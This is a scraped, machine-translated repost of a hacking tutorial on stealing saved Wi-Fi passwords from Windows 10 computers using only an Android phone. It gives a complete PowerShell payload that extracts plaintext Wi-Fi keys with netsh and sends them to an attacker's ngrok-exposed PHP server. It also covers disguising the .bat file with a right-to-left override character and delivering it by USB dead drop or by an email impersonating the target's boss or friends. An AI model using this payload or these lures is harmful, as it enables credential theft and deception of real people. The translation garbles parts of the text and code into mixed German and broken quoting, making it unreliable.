قالب وردپرس درنا توس
Home / Tips and Tricks / How to Filter WPA2 Wi-Fi Passwords with Android and PowerShell «Null Byte :: WonderHowTo

How to Filter WPA2 Wi-Fi Passwords with Android and PowerShell «Null Byte :: WonderHowTo



It's easier than you think to hack into Wi-Fi routers with just one Android Android phone. Brute-forcing is not required. And you do not even have to spend a penny. Nor does this method require a Windows operating system to convert PowerShell scripts to EXE format, a reliable VPS to catch hacked Wi-Fi passwords, or Metasploit for tricks after use.

How this Wi-Fi hack works

UserLAnd is a free Android app that lets you install Kali or Debian in addition to the Android operating system ̵

1; without rooting the device.

Traditional Wi-Fi hacking tools like Aircrack-ng do not work with UserLAnd. To run Airodump-ng, for example, the Android wireless interface must be switched to monitor mode. This requires root access, which UserLAnd does not have. Even if it could be configured to capture a WPA2 handshake, brute-forcing the password with an Android CPU would take an incomprehensible amount of time. That's just not practical.

There is more than one way to compromise a Wi-Fi password. The specific method in this manual requires some education and social engineering. The UserLAnd Kali operating system creates a PowerShell payload that exports exported Wi-Fi passwords to Windows 10. The file extension of the payload is then faked using Unicode to hide the true file type.

In Kali (on Android) A local PHP server is created to intercept Wi-Fi passwords sent from the target's computer. To bypass port forwarding and firewalls, the local PHP server with Ngrok is made accessible to the entire Internet so that the destination can send Wi-Fi passwords from its computer to the locally running PHP server.

That's all in it The tricky part is to reach the goal of clicking on the malicious PowerShell payload, which will be discussed in more detail later in this article.

Getting Started with UserLAnd

Before You Continue, Read the Instructions for Distortion Turning an Android Phone Into a Rootless Hacking Device Because It Treats the Basics of UserLAnd and Provides Everything You Need to follow below. You must install and configure UserLAnd, create a new file system, and connect to the operating system through SSH using ConnectBot (or JuiceSSH or the built-in SSH client).

Step 1: Install Essential Software

Be sure that updates the system and that you first install the required software as specified in the main article by UserLAnd. Then we can start installing the new tools needed, especially Unzip and PHP.

To install unzip, use the command sudo apt-get install unzip .

  apt-get install unzip 
  Read package lists ... Done
Create dependency tree
Status information is read ... Done
Suggested packages:
Post Code
The following NEW packages will be installed:
unzip
0 updated, 1 reinstalled, 0 removed and 0 not updated.
156 kB archives need.
After this process, 518 KB of additional storage space is needed.
Get: 1 http://kali.download/kali kali-rolling / main arm64 unpack arm64 6.0-21 [156 kB]
156 kB in 6s (24.5 kB / s).
debconf: Package configuration delay because apt-utils is not installed
E: setting in start over TCSAFLUSH for stdin failed! - tcsetattr (13: approval denied)
Selecting a previously unselected package will be unpacked.
(Read database ... 13159 files and directories currently installed.)
Preparation for unpacking ... / unzip_6.0-21_arm64.deb ...
Extract unpacking (6.0-21) ...
Setting up unzip (6.0-21) ... 

Before installing PHP, use apt-mark hold apache * to retain some of the Apache web server packages that are automatically downloaded when PHP is installed , This will prevent APT from installing useless Apache binaries and services, which will make the following PHP installation process a little faster.

  apt-mark hold apache * 
  apache2 is held.
Apache user on hold.
apache2-bin is held.
apache2 record is held.
apache2-utils is held.
apache2-doc was kept.
put apache2-suexec-pristine on hold.
apache2-suexec-custom is kept.
apache2-dbg put on hold.
apache2-dev is held.
apache2-ssl-dev is held.
Apacheex put on hold.
Apacheds put on hold.
Apachetop put on hold. 

To install PHP, use the command apt-get install php .

  apt-get install php 
  Read package lists ... Done
Create dependency tree
Status information is read ... Done
The following additional packages will be installed:
bzip2 file libapparmor1 libargon2-1 libicu63 libmagic-mgc libmagic1 libsodium23 libxml2 mime-support php-common php7.3 php7.3-cli php7.3-common php7.3-fpm php7.3-json
php7.3-opcache php7.3-readline psmisc xz-utils
Suggested packages:
bzip2-doc php-pear
The following NEW packages will be installed:
bzip2 file libapparmor1 libargon2-1 libicu63 libmagic-mgc libmagic1 libsodium23 libxml2 mime-support php php-common php7.3 php7.3-cli php7.3-common php7.3-fpm php7.3-json
php7.3-opcache php7.3-readline psmisc xz-utils
0 updated, 21 reinstalled, 0 removed and 0 not updated.
You need 13.6 MB of archives.
After this process, 58.7 MB of additional memory is needed.
Would you like to continue? [Y/n] 

Restart the Android device to make sure that the entire package and kernel updates take effect the next time you launch the Android UserLAnd Kali OS operating system.

Step 2: Setting Up the PHP Server

After the Restart of Android, launch the UserLAnd app and SSH into the new Kali system.

Screen is a program that allows you to manage multiple terminal sessions in the same console. In this case we are talking about the same Android device. Screen has the ability to "unlock" or close the terminal window without losing data in the terminal.

Familiarize yourself with using Screen because it's easy to navigate between multiple terminal sessions without losing data

To start a new screen session, just type screen .

  screen 

Then enter su to enter a root shell.

  su 

] Create a directory named "phpServer /" using the following command mkdir .

  mkdir phpServer / 

Change to the directory phpServer / with the command cd . cd phpServer /

Then create a file named "index.php" with nano .

  nano index.php 

Paste the following PHP script into the nano-terminal. Once done, press Ctrl-x then and then and then .

Recommended at Amazon: ] FAVI Mini Bluetooth Keyboard with Laser Pointer and Illuminated Buttons


     PHP Server 
   
      

Works!

This simple PHP script can intercept data and does not need to be modified in any way for it to work. When the target computer sends its Wi-Fi credentials under Windows 10, this PHP server stores the passwords with the date as the file name and ".credz" as the file extension.

Finally, start the PHP server with the php -S 0.0.0.0:80 command. The -S tells PHP to start a web server, while 0.0.0.0 tells it to host the server on each interface. The 80 is the listening port number. By default, all web servers and browsers use port 80 with HTTP servers.

  php -S 0.0.0.0:80[19659014PHPH 7.3.0-2 The Development Server has been started
Listen to http://0.0.0.0:80
The document root directory is / home / user / phpServer
Press Ctrl-C to exit. 

To terminate or resolve from the screen session without stopping the PHP server, press ctrl-a and then d

step 3: Checking if the PHP server is working

Now there are two ways to check if PHP is still running in the background. First, use curl to send the PHP server some data to emulate Wi-Fi passwords sent to the server.

  curl --data "password: qwerty12345" http://127.0.0.1:80 

Then ls the phpServer / directory to find the newly created .credz file.

  ls -l phpServer / 
  -rw-r - r--. 1 root root 217 Jan 9 00:10 index.php
-rw-r - r--. 1 root root 0 Jan 9 00:15 0900151501.credz 

And cat The file for reading the content.

  cat phpServer / *. Credz 
  Password: qwerty12345 

In other ways To verify that the server is working, use the command below netstat and the Android web browser.

  netstat -luptn | grep -i php 
  tcp 0 0 0.0.0.0:2080 0.0.0.0:* LISTEN 14128 / php 

Note PHP stops listening on port 2080, not 80 as specified in the previous PHP command. For some reason, when opening ports in UserLAnd operating systems, the number 20 is prefixed. It's not clear why this happens, but it's not important because the Ngrok server is unaffected.

Open an Android web browser and navigate to 127.0.0.1:2080 "It works!" message.

If the above netstat command returns no output, the PHP server did not start properly or the screen session was split incorrectly. Go back to step 3 and try again or comment below for further instructions.

Step 4: Create an Ngrok Account

Ngrok is a great service for web developers who want to demonstrate their Web site and test the Web without using firewalls or complex server management. Users can generate a domain name that is connected to an internal or private server. This allows developers to quickly test their websites by temporarily making the server public across the Internet.

However, there is one major drawback to using Ngrok, which I have not mentioned before. Free Ngrok accounts have limitations that can be an obstacle to this hack. Once the Ngrok server starts, it randomly generates the URL, and free accounts are not allowed to reuse or customize URLs. Keep in mind that the generated URL must be hard-coded into the PowerShell payload. If the Ngrok server pauses, the URL can never be reassigned.

If the URL is generated and hard-coded into the payload, the Ngrok server can not be closed. All circumstances or the Wi-Fi passwords of the destination will be sent to a lost URL. Worse, the URL can no longer be used. In short, do not stop the Ngrok server until the target's Wi-Fi passwords have been intercepted.

To start Ngrok, open a web browser and navigate to the sign-in page to create an account. After you have created an account, make a note of the provided "authtoken" as this is required in a later step.

Step 5: Download Ngrok

SSH into the Kali file system and create a new screen session.

  Screen 

Type su [19459013

  su 

Then use the command wget to download the Ngrok Zip. At the time of this writing, version 2.2.8 is the latest. Visit the Ngrok download page for a later version.

  wget # https: //bin.equinox.io/a/nmkK3DkqZEB/ngrok-2.2.8-linux-arm64.zip' [19659014 (- 2019-01-06 04: 39: 30 - https://bin.equinox.io/a/nmkK3DkqZEB/ngrok-2.2.8-linux-arm64.zip
Dissolve bin.equinox.io (bin.equinox.io) ... 34.226.180.131
Connecting to bin.equinox.io (bin.equinox.io) | 34.226.180.131 |: 443 ... connected.
HTTP request sent, waiting for response ... 200 OK
Length: 5063444 (4.8M) [application / octet-stream]
Save as: # ngrok-2.2.8-linux-arm64.zip & # 39;

ngrok -2.2.8-linux-arm64.zip 100% [==============>] 4.83M 293KB / s in 16s

2019-01-06 04:39:52 (306 KB / s) - & nbsp; n.2-2.8-linux-arm64.zip & # 39; [5063444/5063444] 

Next unpack the download. [19659013] Unzip ngrok-2.2.8-linux-arm64.zip

  Archive: ngrok-2.2.8-linux-arm64.zip
Pump up: ngrok 

Lists files in the directory to find the new Ngrok binary file.

  ls -l 
  total 20328
-rwxr-xr-x. 1 root root 15747855 15th july 2017 ngrok
-rw-r - r--. 1 root root 5063444 Jan 6 04:39 ngrok-2.2.8-linux-arm64.zip 

Configure Ngrok to use the authoken provided after login. This gives you access to features for accounts only. In addition, Ngrok servers can map the local PHP server to your Ngrok account. Use the following command ngrok with the argument authtoken .

  ./ngrok authtoken YourNgrokAuthTokenHere 
  Authtoken stored in configuration file: /root/.nngrok2/ngrok .yml 

For more information on how Ngrok works and the arguments available, see the official documentation.

Step 6: Starting the Ngrok Tunnel

To make the PHP server publicly available, use the following information ] ngrok command.

  ./ngrok http 80 

At this point, I experienced an irritating bug that caused Ngrok to fail and the entire Android screen to go completely blank. It's unclear if this is a bug in the Ngrok binary, Screen, ConnectBot, UserLAnd, or something else. If you use integrated SSH or JuiceSSH instead of ConnectBot and you do not, this might be the case.

If the screen stops responding when executing the above command ngrok press ctrl-c to abort the previous command. Then press Ctrl-d to end the screen session. You must create a new screen session, enter a root shell, and run the ngrok command again. Simply keep trying until it works. If anyone discovers the cause or workaround for this issue, please leave a comment.

If the Ngrok command succeeded, make a note of the forwarding URL as it must be added to the PowerShell payload. Then solve the screen session without terminating the Ngrok server by pressing Ctrl-a and then d . Session status online
Account XXXXX XXXXXXXX (Normal: Free)
Version 2.2.8
Web Interface United States (us)
Forwarding http://XXXXXX.ngrok.io -> localhost: 80
Forwarding https://XXXXXX.ngrok.io -> localhost: 80

Connections ttl opn rt1 rt5 p50 p90
0 0 0,00 0,00 0,00 0,00

Step 7: Checking if the Ngrok tunnel is working

After disconnecting from the screen session, check if ngrok and PHP are working by using the command " curl " to send the server data. Do not forget to change the "SUBDOMAIN" in the Ngrok URL to your redirect address.

  curl --data "ngrok works!" & # 39; http: //SUBDOMAIN.ngrok.io' 

     PHP server 
   
      

It works!

Curl should return multiple HTML lines if the data was sent successfully. Use cat to read the newly created .credz file in the phpServer / directory.

  cat phpServer / *. Credz 
  ngrok works! 

Step 8: Create the PowerShell Payload [19659009] For fast replication, there is a PHP server that runs locally in the background and intercepts Wi-Fi passwords sent by the target device. There is also a ngrok service in the background that makes the PHP server accessible to the entire Internet without revealing the IP address on our Android device.

Now we need to create the payload that will be shared with the target. This is what the PowerShell payload looks like:

  Add-Type -AssemblyName System.Web;

$ ngrokServer = "http://SUBDOMAIN.ngrok.io/index.php";

foreach ($ path in [System.IO.Directory] :: EnumerateFiles ("C:  ProgramData  Microsoft  Wlansvc  Profiles", "*. xml", "AllDirectories")) {

To attempt {
$ oXml = New-Object System.XML.XMLDocument;
$ oXml.Load ($ path);
$ ssid = $ oXml.WLANProfile.SSIDConfig.SSID.Name;
$ netinfo = netsh.exe wlan show profiles name = "$ ssid" key = clear;
$ pass = (($ netinfo | Select-String -Pattern "Key Content") -split ":") [1] .Trim ();
$ sendData + = "SSID:" + ($ ssid) + "` n "+" PASSWORD: "+ ($ pass) +" `n`n";
} Catch {}

}

Invoke-WebRequest -Uri $ ngrokServer method & # 39; POST & # 39; -Body $ sendData; 

The PowerShell script goes through all of the Wi-Fi network names (SSIDs) stored on the computer (in the XML documents in "C: ProgramData Microsoft Wlansvc Profiles ")) and execute the netsh for each SSID to retrieve the Wi-Fi passwords in plain text (labeled "Key Content").

It then analyzes the Netsh output and takes the detected Wi-Fi SSIDs and passwords, concatenates them in the "$ sendData" variable, and sends them to the Ngrok server.

To better understand how Netsh is used, let's just give you a sample output. If you have a Windows 10 computer, you can type the following netsh command at a command prompt to view stored Wi-Fi passwords.

  netsh wlan show profiles name = "SSID HERE" = clear 

The netsh command will display a range of information over the Wi-Fi network, but most of them are unusable to attackers. Scroll down to the "Key Content" line, where the WLAN password is displayed in clear text. Below is an example of a Netsh edition.

And here's the same PowerShell payload in single-line format:

  powershell -ExecutionPolicy Bypass Command "Add-Type -AssemblyName System.Web; $ ngrokServer =  "http: //SUBDOMAIN.ngrok.io/index.php "; foreach ($ path in [System.IO.Directory] :: EnumerateFiles ( "C:  ProgramData  Microsoft  Wlansvc  Profiles  ", " *. Xml  ", " AllDirectories  "))) {try {$ oXml = New Object System.XML.XMLDocument; $ oXml.Load ($ path); $ ssid = $ oXml.WLANProfile.SSIDConfig .SSID.Name; $ netinfo = netsh.exe wlan show profiles name =  "$ ssid" key = clear; $ pass = (($ netinfo | Select-String -Pattern  "Key Content ") -split  ": ") [1] .Trim (); $ sendData + = " SSID:  "+ ($ ssid) + " n  "+ " PASSWORD:  "+ ($ pass) + " `n`n  ";} catch {}}; Invoke-WebRequest -Uri $ ngrokServer -Method " POST  -Body $ sendData; "

The one-line format is required because it is stored in a .bat file and executed as a single line. This One-Liner should be stored in the / sdcard / Download / directory with the .bat file extension. makes the user data for the Android operating system for further manipulations accessible.

  nano /sdcard/Download/payload.bat[19659015(BerücksichtigenSieinderNutzlastdass"SUBDOMAIN"anIhreNgrokForwarding-URLangepasstwirdSpeichernSiedieDateiInmeinenExperimentenfunktioniertedieHTTPS-Weiterleitungs-URLnichtmitdemPHP-ServeranPort80VerwendenSiedieHTTP-Weiterleitungs-URLundnichtHTTPS

Schritt 9 : Spoof the BAT file extension

Spoofing file extensions were treated for null bytes. For a detailed explanation, see " Hack WPA2 Wi-Fi Passwords with USB Dead Drops."

I use the filename "payloadfdp .bat "to make this article easier to follow However, the file name should look something like "passwordtxt.bat" or "secretfdp.bat" to create a sense of legitimacy. Be creative here if you use social engineering as your goal.

Navigate to Unicode Table with a favorite Android web browser and copy the "Right-to-Left Override" (RLO) character. Then open the Android download app, rename the payload.bat file, and insert the RLO character to reverse the order of the characters displayed in the file name.

Remember that the characters are not really reversed. How Android and Windows 10 display the characters is reversed. Windows 10 still recognizes the file extension .bat and executes it as such.

Step 10: Deliver Payload

Once everything is set up, the payload can now be delivered to the destination. There are two possible delivery methods listed below, but this is by no means an exhaustive list. Other tactics may be possible if more is known about the target.

Option 1: USB Dead Drop

USB Dead Drop is not available for some of you, but is a very reliable method. You need an OTG adapter to connect the USB stick to your Android device. The payload would be copied to the USB drive and placed in a strategic location where the target can be found.

Instead of an OTG adapter, however, there are flash drives with USB-C and USB 3.1 ends that can be connected to both an Android and computer. For older devices, there are also two USB flash drives with micro USB and USB 3.0 terminals.

Samsung Duo Plus 128GB - 300MB / s USB 3.1 Flash Drive: Amazon | Best Buy | Walmart

Again, this hack is intended as a 100% free method. So if you do not have an OTG adapter and / or a suitable USB stick that you want to lose, this option is not work. Of course, if you do not mind spending money, you can buy some of the above items.

Those of you who have an OTG cable and / or a USB disposable USB stick should read "Hack WPA2 Wi-Fi Passwords" Using USB Dead Drops "for more information on social engineering Aspects of USB Dead-Drop Attacks.

Option 2: Email Attachment

Mail delivery may require a spoofing address depending on how much information about Alternatively, if you know the destination, you can create a new Gmail account by using the name and profile picture of a friend, relative, or colleague of the destination, such as an email from the boss or target of the destination he or she is requesting The attached PDF file is the PowerShell payload created in step 7.

If you are sending the .bat payload by e-mail, it is important to compress this file, otherwise the fake filename (containing Unicode) in the Webb The targeter's rowser appears corrupted and may cause the email and attachment (see below) to be suspected.

Download Chrome browser for .bat with Unicode in file name through Chrome browser.

To compress the .bat because it contains Unicode, open the Download app, select payload.bat, and tap Compress. By default, Android uses the RLO Unicode character in its name the ZIP file - what we do not want to do search for the file you just created the file extension .pdf will be displayed Notice the "piz" in the filename This is zip thanks to the Unicode character of RLO Backwards, select the file and rename it "compress.zip" to modify it.

When the target extracts the compressed file, Payload.bat is generated with the unrestricted and fake RLO Unicode extension.

Step 11: Access the hacked Wi-Fi credentials

When the target clicks on the payload, Windows 10 sends each stored Wi-Fi password to your Ngrok server. Ngrok will then forward the credentials immediately to the local PHP server on your Android device.

To display the hacked passwords, simply use cat the .credz file (s) in the phpServer / directory.

  cat ~ / phpServer / *. credz 
  SSID: NETGEAR77
PASSWORD: Smoothebreeze161

SSID: DeathStar
PASSWORD: UseTheForceDude!

SSID: Get your own Wi-Fi
PASSWORD: 6 (CHo-48Qm6% ae2-7.V4 

Step 12: Improve this attack (optional)

Much can be done to improve the effectiveness of such remote attacks Lead the way to develop this attack and thereby increase its chances of success.

The CMD Pop-Up

When you click the .bat PowerShell payload, the target is displayed with an obvious terminal pop -up: The Popup can not be suppressed (using the .bat format) and will remain on the screen for a few seconds, depending on how many Wi-Fi passwords have been stored on the computer, and additional Wi-Fi passwords will result in a longer pop-up time.

This is a great indication that the payload is indeed a malicious file, with the benefit that after running the .bat, the target is likely to have no more than a few seconds.before all passwords were sent to the Ngrok server. If stealth is not critical to the success of the attack, the .bat payload will serve its purpose.

The Not of Obfuscation

The PowerShell payload is sent in plain text to the target. No base64 encryption or encryption is required to encrypt or hide the code. Even non-technical targets can identify the Ngrok URL and display the Invoke-WebRequest and PASSWORD command lines in the payload. It is very obvious that something very strange is going on. Such attacks usually lead to immediate discovery.

The Payload Icon

There are some advantages and disadvantages of using .bat files as a payload delivery mechanism. They make it very easy to run PowerShell scripts and bypass antivirus software. Unlike EXE and SCR file extensions, there is no way to fake the file icon. The default icon .bat is clearly not a text file or PDF file. This could cause suspicion in the target and cause the file to be deleted.

The Lack of Social Engineering

The presented PowerShell payload is very simple. It goes through saved Wi-Fi passwords and sends them to the server of the attacker - nothing more. In a real-world scenario, there should be some code that can open a text file or a PDF for the target to believe the file is what it says. There has to be some sort of user-based social engineering to keep the target from becoming aware that something nasty is happening right in front of them. Such degrees of social engineering can help prevent the detection of payloads on a target computer.

Conclusion

This hack is far from certain. More can be done to disguise the payload to make it look ordinary, and the delivery methods require some targeted social engineering to work. However, it shows how some simple technologies can be combined to compromise a Windows 10 computer and hide desired information.

Die gesamte in diesem Artikel verwendete Software und Schritte wurden vollständig auf einem einzigen Android-Telefon ausgeführt. Dies ist ein Android-Telefon mit einem Debian-Betriebssystem, das zwei Arten von Webservern hostet, und ein bisschen PowerShell-Code, um alles zusammenzubringen.

Bleiben Sie dran für zukünftige Artikel, in denen ich mehr lustige Hacks zeige, die einfach ausgeführt werden können ein Android-Gerät. Wenn Ihnen dieser Artikel gefallen hat, folgen Sie mir auf Twitter @tokyoneon_ und GitHub, um bei meinen aktuellen Projekten zu bleiben. Für Fragen und Bedenken hinterlassen Sie bitte einen Kommentar oder eine Nachricht auf Twitter.

Don't Miss: CVEs mit Nmap-Skripts leicht erkennen

Titelbild und Screenshots von tokyoneon / Null Byte




Source link